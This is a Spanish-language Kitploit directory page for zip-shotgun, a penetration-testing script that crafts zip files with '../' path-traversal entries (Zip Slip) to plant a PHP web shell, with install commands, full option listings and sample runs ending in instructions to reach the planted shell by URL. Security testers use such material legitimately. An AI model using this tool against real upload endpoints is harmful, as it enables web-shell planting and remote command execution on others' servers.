Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
zip-shotgun — Script de utilidad para probar la funcionalidad de carga de archivos zip (y posible extracción de archivos zip) en busca de vulnerabilidades (también conocido como Zip Slip) | Kitploit
Herramientas/GitHubGitHub/jpiechowka/zip-shotgun
Generación de PayloadsAnálisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de Penetración
GitHubjpiechowka/zip-shotgun

zip-shotgun

Script de utilidad para probar la funcionalidad de carga de archivos zip (y posible extracción de archivos zip) en busca de vulnerabilidades (también conocido como Zip Slip)

Ver Repositorio
325104hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ZIP Shotgun

Script de utilidad para probar la funcionalidad de carga de archivos zip (y posible extracción de archivos zip) en busca de vulnerabilidades (también conocido como Zip Slip). La idea de este script proviene de esta publicación en Silent Signal Techblog - Compressed File Upload And Command Execution y de OWASP - Test Upload of Malicious Files

Snyk.io tiene un informe sobre cómo funciona esto: Zip Slip vulnerability y un repositorio de GitHub con bibliotecas vulnerables en diferentes idiomas: Snyk.io Zip Slip github repo

También hay un gran video de LiveOverflow que arroja algo de luz sobre las vulnerabilidades Zip Slip y Zipperdown: Critical .zip vulnerabilities? - Zip Slip and ZipperDown

Este script creará un archivo que contiene archivos con "../" en el nombre de archivo. Al extraerlo, esto podría causar que los archivos se extraigan en directorios anteriores. Puede permitir que un atacante extraiga shells a directorios a los que se pueda acceder desde el navegador web.

La shell web predeterminada es la shell web PHP de wwwolf y todo el crédito le corresponde a WhiteWinterWolf. La fuente está disponible AQUÍ

Instalación

  1. Instalar usando Python pip (Python 3 requerido)

    pip3 install zip-shotgun --upgrade

  2. Clonar el repositorio git e instalar

    git clone https://github.com/jpiechowka/zip-shotgun.git

    Ejecutar desde el directorio raíz del repositorio clonado (donde se encuentra el archivo setup.py)

    pip3 install . --upgrade

Uso y opciones

Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

Options:
  --version                       Show the version and exit.
  -c, --directories-count INTEGER
                                  Count of how many directories to go back
                                  inside the zip file (e.g 3 means that 3
                                  files will be added to the zip: shell.php,
                                  ../shell.php and ../../shell.php where
                                  shell.php is the name of the shell you
                                  provided or randomly generated value
                                  [default: 16]
  -n, --shell-name TEXT           Name of the shell inside the generated zip
                                  file (e.g shell). If not provided it will be
                                  randomly generated. Cannot have whitespaces
  -f, --shell-file-path PATH      A file that contains code for the shell. If
                                  this option is not provided wwwolf
                                  (https://github.com/WhiteWinterWolf/wwwolf-
                                  php-webshell) php shell will be added
                                  instead. If name is provided it will be
                                  added to the zip with the provided name or
                                  if not provided the name will be randomly
                                  generated.
  --compress                      Enable compression. If this flag is set
                                  archive will be compressed using DEFALTE
                                  algorithm with compression level of 9. By
                                  default there is no compression applied.
  -h, --help                      Show this message and exit.

Ejemplos

  1. Usando todas las opciones predeterminadas

    zip-shotgun archive.zip

    Parte de la salida del script

    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
    ...
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
    
  2. Usando opciones predeterminadas y habilitando la compresión para el archivo comprimido

    zip-shotgun --compress archive.zip

    Parte de la salida del script

    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    ...
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
    
  3. Usando opciones predeterminadas pero cambiando el número de directorios a retroceder en el archivo comprimido a 3

Descargar herramienta